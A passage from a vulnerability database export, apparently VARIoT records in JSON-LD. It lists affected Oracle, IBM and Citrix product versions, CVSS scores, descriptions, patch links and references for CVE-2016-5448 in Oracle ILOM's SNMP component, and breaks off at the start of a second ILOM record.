scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: "healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92008", }, { db: "JVNDB", id: "JVNDB-2016-003876", }, { db: "CNNVD", id: "CNNVD-201607-812", }, { db: "NVD", id: "CVE-2016-5448", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003876", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92008", }, ], trust: 0.6, }, cve: "CVE-2016-5448", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 6.4, confidentialityImpact: "NONE", exploitabilityScore: 10, id: "CVE-2016-5448", impactScore: 4.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 1.9, vectorString: "AV:N/AC:L/Au:N/C:N/I:P/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 6.4, confidentialityImpact: "NONE", exploitabilityScore: 10, id: "VHN-94267", impactScore: 4.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:N/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "LOW", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", exploitabilityScore: 3.9, id: "CVE-2016-5448", impactScore: 2.5, integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-5448", trust: 1, value: "MEDIUM", }, { author: "NVD", id: "CVE-2016-5448", trust: 0.8, value: "Medium", }, { author: "CNNVD", id: "CNNVD-201607-812", trust: 0.6, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-94267", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2016-5448", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-94267", }, { db: "VULMON", id: "CVE-2016-5448", }, { db: "JVNDB", id: "JVNDB-2016-003876", }, { db: "CNNVD", id: "CNNVD-201607-812", }, { db: "NVD", id: "CVE-2016-5448", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect integrity and availability via vectors related to SNMP. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the 'SNMP' protocol. The 'SNMP' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation. A remote attacker could exploit this vulnerability to update, insert, or delete data, possibly causing a denial of service. Affect data integrity and availability", sources: [ { db: "NVD", id: "CVE-2016-5448", }, { db: "JVNDB", id: "JVNDB-2016-003876", }, { db: "BID", id: "91787", }, { db: "BID", id: "92008", }, { db: "VULHUB", id: "VHN-94267", }, { db: "VULMON", id: "CVE-2016-5448", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-5448", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "92008", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003876", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-812", trust: 0.7, }, { db: "VULHUB", id: "VHN-94267", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-5448", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-94267", }, { db: "VULMON", id: "CVE-2016-5448", }, { db: "BID", id: "91787", }, { db: "BID", id: "92008", }, { db: "JVNDB", id: "JVNDB-2016-003876", }, { db: "CNNVD", id: "CNNVD-201607-812", }, { db: "NVD", id: "CVE-2016-5448", }, ], }, id: "VAR-201607-0655", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-94267", }, ], trust: 0.01, }, last_update_date: "2024-11-23T20:57:46.912000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63172", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-5448", }, { db: "JVNDB", id: "JVNDB-2016-003876", }, { db: "CNNVD", id: "CNNVD-201607-812", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-5448", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/92008", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5448", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5448", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-94267", }, { db: "VULMON", id: "CVE-2016-5448", }, { db: "BID", id: "91787", }, { db: "BID", id: "92008", }, { db: "JVNDB", id: "JVNDB-2016-003876", }, { db: "CNNVD", id: "CNNVD-201607-812", }, { db: "NVD", id: "CVE-2016-5448", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-94267", }, { db: "VULMON", id: "CVE-2016-5448", }, { db: "BID", id: "91787", }, { db: "BID", id: "92008", }, { db: "JVNDB", id: "JVNDB-2016-003876", }, { db: "CNNVD", id: "CNNVD-201607-812", }, { db: "NVD", id: "CVE-2016-5448", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-94267", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-5448", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "92008", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003876", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-812", }, { date: "2016-07-21T10:15:03.867000", db: "NVD", id: "CVE-2016-5448", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: "VHN-94267", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-5448", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "92008", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003876", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-812", }, { date: "2024-11-21T02:54:20.170000", db: "NVD", id: "CVE-2016-5448", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92008", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In SNMP Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003876", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92008", }, ], trust: 0.6, }, }
var-201607-0665
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote authenticated users to affect confidentiality, integrity, and availability via vectors related to LUMAIN. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health 